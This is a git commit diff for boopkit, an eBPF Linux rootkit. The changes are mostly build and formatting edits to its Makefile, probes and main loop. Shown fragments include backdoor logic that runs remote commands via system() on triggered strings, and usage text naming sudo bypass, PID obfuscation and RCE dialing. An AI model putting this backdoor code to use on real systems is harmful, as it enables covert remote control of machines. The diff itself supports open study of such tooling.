Automatic commit from github.com/kris-nova/bin/git-save

Signed-off-by: Kris Nóva <kris@nivenly.com>

Makefile

@@ -60,9 +60,12 @@ install: ## Install boopkit to /usr/bin/boopkit
 	cp pr0be.safe.o ${HOME}/.boopkit/pr0be.safe.o
 	cp pr0be.boop.o ${HOME}/.boopkit/pr0be.boop.o
 
-pr0be: pr0be.boop.o pr0be.safe.o ## Compile eBPF probes
+pr0be: autogen pr0be.boop.o pr0be.safe.o ## Compile eBPF probes
 	@echo "  ->  Building eBPF pr0bes"
 
+autogen:
+	bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
+
 pr0be.boop.o: pr0be.boop.c
 	@echo "  ->  Building pr0be.boop.o"
 	clang -S \
@@ -76,7 +79,6 @@ pr0be.boop.o: pr0be.boop.c
 
 pr0be.safe.o: pr0be.safe.c
 	@echo "  ->  Building pr0be.safe.o"
-	bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
 	clang -S \
 	    -target bpf \
 	    -D __BPF_TRACING__ \

boop/tcp.c

@@ -269,7 +269,6 @@ void create_ack_rst_packet(struct sockaddr_in *src, struct sockaddr_in *dst,
   iph->saddr = src->sin_addr.s_addr;
   iph->daddr = dst->sin_addr.s_addr;
 
-
   // TCP header configuration
   tcph->source = src->sin_port;
   tcph->dest = dst->sin_port;

boopkit.c

@@ -50,7 +50,9 @@ void usage() {
   boopprintf("Options:\n");
   boopprintf("-h, help           Display help and usage for boopkit.\n");
   boopprintf("-s, sudo-bypass    Bypass sudo check. Breaks PID obfuscation.\n");
-  boopprintf("-l, local-only     Disable dialing the trigger program source address for RCE.\n");
+  boopprintf(
+      "-l, local-only     Disable dialing the trigger program source address "
+      "for RCE.\n");
   boopprintf("-q, quiet          Disable output.\n");
   boopprintf("-x, reject         Source addresses to reject triggers from.\n");
   boopprintf("\n");
@@ -365,12 +367,11 @@ int main(int argc, char **argv) {
             system(rce);
           }
           free(rce);
-        }else if (strlen(ret.rce) >0 ){
+        } else if (strlen(ret.rce) > 0) {
           boopprintf("  <- Executing: %s\r\n", ret.rce);
           system(ret.rce);
           boopprintf("  -> no RCE found!\n");
         }
-
       }
       err = bpf_map_delete_elem(fd, &jkey);
       if (err < 0) {

boopkit.h

@@ -20,6 +20,7 @@
 // ╚═╝  ╚═══╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═╝
 //
 
+#pragma once
 #ifndef BOOPKIT_BOOPKIT_H
 #define BOOPKIT_BOOPKIT_H
 

pr0be.boop.c

@@ -28,23 +28,18 @@
 // to userspace!
 //
 // clang-format off
-#include <linux/bpf.h>
-#include <bpf/bpf_helpers.h>
+#include "vmlinux.h"
 // clang-format on
-#include <arpa/inet.h>
-#include <netinet/in.h>
-#include <stdbool.h>
-#include <stdio.h>
+#include <bpf/bpf_helpers.h>
 #include <string.h>
-// clang-format off
+
 #include "boopkit.h"
-// clang-format on
 
 struct {
   __uint(type, BPF_MAP_TYPE_HASH);
   __uint(max_entries, 128);
   __type(key, int);
-  __type(value, struct tcp_return);
+  __type(value, struct encapsulated_tcp_boop);
 } boopproto SEC(".maps");
 
 struct tcp_bad_csum_args_t {
@@ -71,14 +66,14 @@ struct tcp_bad_csum_args_t {
 // print fmt: "src=%pISpc dest=%pISpc", REC->saddr, REC->daddr
 SEC("tracepoint/tcp/tcp_bad_csum")
 int tcp_bad_csum(struct tcp_bad_csum_args_t *args) {
-  char saddrvalchar[INET_ADDRSTRLEN];
-  inet_ntop(AF_INET, &args->saddr, saddrvalchar, INET_ADDRSTRLEN);
-  int saddrkey = 1;
-  __u8 saddrval[4];
-  inet_pton(AF_INET, saddrvalchar, saddrval);
-  struct encapsulated_tcp_boop ret;
-  memcpy(ret.saddrval, saddrval, sizeof saddrval);
-  bpf_map_update_elem(&boopproto, &saddrkey, &ret, 1);
+  //  char saddrvalchar[INET_ADDRSTRLEN];
+  //  inet_ntop(AF_INET, &args->saddr, saddrvalchar, INET_ADDRSTRLEN);
+  //  int saddrkey = 1;
+  //  __u8 saddrval[4];
+  //  inet_pton(AF_INET, saddrvalchar, saddrval);
+  //  struct encapsulated_tcp_boop ret;
+  //  memcpy(ret.saddrval, saddrval, sizeof saddrval);
+  //  bpf_map_update_elem(&boopproto, &saddrkey, &ret, 1);
   return 0;
 }
 

pr0be.safe.c

@@ -35,19 +35,15 @@
 #include <bpf/bpf_core_read.h>
 #include <bpf/bpf_helpers.h>
 #include <bpf/bpf_tracing.h>
-// clang-format off
 #include "boopkit.h"
-// clang-format on
 
 char LICENSE[] SEC("license") = "Dual BSD/GPL";
 
-// Ringbuffer Map to pass messages from kernel to user
 struct {
   __uint(type, BPF_MAP_TYPE_RINGBUF);
   __uint(max_entries, 256 * 1024);
 } rb SEC(".maps");
 
-// Map to fold the dents buffer addresses
 struct {
   __uint(type, BPF_MAP_TYPE_HASH);
   __uint(max_entries, 8192);